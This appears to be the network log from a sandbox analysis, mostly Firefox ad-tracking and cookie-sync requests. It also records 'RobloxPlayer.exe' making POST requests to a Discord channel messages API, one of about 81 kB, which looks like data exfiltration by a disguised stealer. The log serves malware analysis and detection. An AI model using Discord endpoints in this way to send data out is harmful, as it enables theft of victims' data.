GET https://token.rubiconproject.com/token?pid=50242&puid=AU1D-0100-001716689186-TBCHXBQA-GKIV&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

HTTP Response

204
142.250.200.2:443

https://cm.g.doubleclick.net/pixel?google_nid=audigent_w_appnexus_3985&google_cm&google_sc&google_ula=450542624&id=AU1D-0100-001716689186-TBCHXBQA-GKIV

tls, http2

firefox.exe

1.9kB
7.1kB
15
20

HTTP Request

GET https://cm.g.doubleclick.net/pixel?google_nid=audigent_w_appnexus_3985&google_cm&google_sc&google_ula=450542624&id=AU1D-0100-001716689186-TBCHXBQA-GKIV
52.48.62.133:443

https://ad.360yield.com/ux?&publisher_dmp_id=15&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fimpr_match%3Fid%3DAU1D-0100-001716689186-TBCHXBQA-GKIV%26impr_uid%3D%7BPUB_USER_ID%7D

tls, http2

firefox.exe

1.7kB
6.7kB
12
16

HTTP Request

GET https://ad.360yield.com/ux?&publisher_dmp_id=15&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fimpr_match%3Fid%3DAU1D-0100-001716689186-TBCHXBQA-GKIV%26impr_uid%3D%7BPUB_USER_ID%7D

HTTP Response

200
69.166.1.66:443

https://sync.go.sonobi.com/us?https://ids.ad.gt/api/v1/son_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&uid=[UID]&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

tls, http2

firefox.exe

3.0kB
8.9kB
15
20

HTTP Request

GET https://sync.go.sonobi.com/us?https://ids.ad.gt/api/v1/son_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&uid=[UID]&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

HTTP Response

302
35.244.159.8:443

https://u.openx.net/w/1.0/cm?id=998eaf06-9905-4eae-9e26-9fac75960c53&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fopenx%3Fopenx_id%3D%7BOPENX_ID%7D%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV%26auid%3DAU1D-0100-001716689186-TBCHXBQA-GKIV

tls, http2

firefox.exe

2.0kB
5.4kB
15
18

HTTP Request

GET https://u.openx.net/w/1.0/cm?id=998eaf06-9905-4eae-9e26-9fac75960c53&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fopenx%3Fopenx_id%3D%7BOPENX_ID%7D%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV%26auid%3DAU1D-0100-001716689186-TBCHXBQA-GKIV
178.250.7.13:443

https://dnacdn.net/dna

tls, http2

firefox.exe

1.7kB
5.1kB
14
14

HTTP Request

GET https://dnacdn.net/dna

HTTP Response

200
162.19.138.82:443

https://lb.eu-1-id5-sync.com/lb/v1

tls, http2

firefox.exe

1.7kB
4.3kB
14
15

HTTP Request

GET https://lb.eu-1-id5-sync.com/lb/v1

HTTP Response

200
3.233.179.64:443

rp.liadm.com

tls

firefox.exe

3.1kB
6.7kB
13
16
23.53.174.156:443

https://secure.cdn.fastclick.net/js/pubcid/latest/pubcid.min.js

tls, http2

firefox.exe

2.4kB
23.2kB
17
26

HTTP Request

GET https://secure.cdn.fastclick.net/js/pubcid/latest/pubcid.min.js

HTTP Response

200
104.22.53.86:443

https://cdn.id5-sync.com/api/1.0/id5-api.js

tls, http2

firefox.exe

1.7kB
35.1kB
14
38

HTTP Request

GET https://cdn.id5-sync.com/api/1.0/id5-api.js

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.1kB
2.9kB
8
11

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

81.1kB
4.8kB
71
44

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.2kB
2.9kB
10
11

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
172.217.169.65:443

https://7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com/safeframe/1-0-40/html/container.html

tls, http2

firefox.exe

1.9kB
9.2kB
15
20

HTTP Request

GET https://7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com/safeframe/1-0-40/html/container.html
162.19.138.83:443

https://id5-sync.com/g/v2/882.json

tls, http2

firefox.exe

3.9kB
5.3kB
16
19

HTTP Request

POST https://id5-sync.com/g/v2/882.json

HTTP Response

200
34.107.140.113:443

https://s2s.t13.io/openrtb2/auction

tls, http2

firefox.exe

8.7kB
27.4kB
28
42

HTTP Request

POST https://s2s.t13.io/cookie_sync

HTTP Request

POST https://s2s.t13.io/openrtb2/auction
34.107.140.113:443

s2s.t13.io

tls, http2

firefox.exe

1.3kB
5.7kB
11
10
34.120.63.153:443

https://prebid.media.net/rtb/prebid?cid=8CUJ8GUQF

tls, http2

firefox.exe

7.8kB
8.1kB
19
23

HTTP Request

POST https://prebid.media.net/rtb/prebid?cid=8CUJ8GUQF
185.89.210.90:443

ib.adnxs.com

tls

firefox.exe

8.4kB
20.1kB
25
32
178.250.1.8:443

https://bidder.criteo.com/cdb?profileId=207&av=36&wv=8.40.2&cb=76991966651&lsavail=1&bundle=zuHKE19aNWVsZnRDU3NBRUtFYUVRdmZTYjAyNlVxOUVSb0h0b2JGZ0FhUjc0SmttSW1OS0g1TGZWWG9pS3lLcFY3T0xzOFAlMkJ5T0l4VGFkVERpRTBFSWx1QWZId2lFeElGQnh1YmJLeHVHN3cxeFdvU0d1bWRZdmdGOXZYejc4YXZQNUxJ

tls, http2

firefox.exe

18.0kB
5.6kB
30
26

HTTP Request

POST https://bidder.criteo.com/cdb?profileId=207&av=36&wv=8.40.2&cb=92814424168&lsavail=1&bundle=zuHKE19aNWVsZnRDU3NBRUtFYUVRdmZTYjAyNlVxOUVSb0h0b2JGZ0FhUjc0SmttSW1OS0g1TGZWWG9pS3lLcFY3T0xzOFAlMkJ5T0l4VGFkVERpRTBFSWx1QWZId2lFeElGQnh1YmJLeHVHN3cxeFdvU0d1bWRZdmdGOXZYejc4YXZQNUxJ

HTTP Response

204

HTTP Request

POST https://bidder.criteo.com/cdb?profileId=207&av=36&wv=8.40.2&cb=76991966651&lsavail=1&bundle=zuHKE19aNWVsZnRDU3NBRUtFYUVRdmZTYjAyNlVxOUVSb0h0b2JGZ0FhUjc0SmttSW1OS0g1TGZWWG9pS3lLcFY3T0xzOFAlMkJ5T0l4VGFkVERpRTBFSWx1QWZId2lFeElGQnh1YmJLeHVHN3cxeFdvU0d1bWRZdmdGOXZYejc4YXZQNUxJ

HTTP Response

204
172.217.16.225:443

https://tpc.googlesyndication.com/sodar/sodar2.js

tls, http2

firefox.exe

1.8kB
13.2kB
16
24

HTTP Request

GET https://tpc.googlesyndication.com/sodar/sodar2.js
142.250.187.196:443

https://www.google.com/recaptcha/api2/aframe

tls, http2

firefox.exe

1.9kB
7.4kB
15
21

HTTP Request

GET https://www.google.com/recaptcha/api2/aframe
172.66.42.247:443

resources.infolinks.com

tls

firefox.exe

4.5kB
94.8kB
33
112
3.162.140.5:443

https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

tls, http2

firefox.exe

1.8kB
19.0kB
14
24

HTTP Request

GET https://cdn.browsiprod.com/bootstrap/bootstrap.js

HTTP Response

200

HTTP Request

GET https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

HTTP Response

200
52.89.16.229:443

events.browsiprod.com

tls

firefox.exe

5.0kB
7.0kB
20
20
216.58.201.106:443

chromewebstore.googleapis.com

tls

1.8kB
7.9kB
13
16
3.162.140.33:443

https://yield-manager.browsiprod.com/supply/v5?sk=d_mapping&pk=freestar&url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&bid=QRVKjwVVQoClbUOr%40uoq&at=How%20to%20tell%20if%20you%27ve%20been%20ratted%20%7C%20Se7enSins%20Gaming%20Community&sw=1280&sh=720&r=https%3A%2F%2Fwww.google.com%2F

tls, http2

firefox.exe

1.8kB
8.4kB
12
15

HTTP Request

GET https://yield-manager.browsiprod.com/supply/v5?sk=d_mapping&pk=freestar&url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&bid=QRVKjwVVQoClbUOr%40uoq&at=How%20to%20tell%20if%20you%27ve%20been%20ratted%20%7C%20Se7enSins%20Gaming%20Community&sw=1280&sh=720&r=https%3A%2F%2Fwww.google.com%2F

HTTP Response

200
69.173.156.148:443

https://pixel.rubiconproject.com/tap.php?v=223352&nid=4584&put=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA

tls, http

firefox.exe

3.8kB
7.7kB
17
22

HTTP Request

GET https://pixel.rubiconproject.com/exchange/sync.php?p=pbs-triple13&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---

HTTP Response

302

HTTP Request

GET https://pixel.rubiconproject.com/tap.php?v=223352&nid=4584&put=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA

HTTP Response

204
3.162.140.5:443

https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

tls, http2

firefox.exe

2.8kB
96.8kB
29
85

HTTP Request

GET https://cdn.browsiprod.com/static_js/freestar/se7ensins/PreEngine_desktop_2023-10-25T10:24:38.814.js

HTTP Response

200

HTTP Request

GET https://cdn.browsiprod.com/sd/apps/middy/middy-desktop-4.25.21.js

HTTP Response

200

HTTP Request

GET https://cdn.browsiprod.com/abd.js

HTTP Response

200

HTTP Request

GET https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

HTTP Request

GET https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

HTTP Request

GET https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

HTTP Response

200

HTTP Response

200

HTTP Response

200
172.66.42.247:443

router.infolinks.com

tls

firefox.exe

1.3kB
5.9kB
11
10
172.64.151.101:443

https://ssum-sec.casalemedia.com/usermatch?cb=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fgpp%3D%26gpp_sid%3D%26bidder%3Dix%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid=&s=184674&us_privacy=1---&C=1

tls, http2

firefox.exe

6.8kB
10.5kB
18
23

HTTP Request

GET https://ssum-sec.casalemedia.com/usermatch?s=184674&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA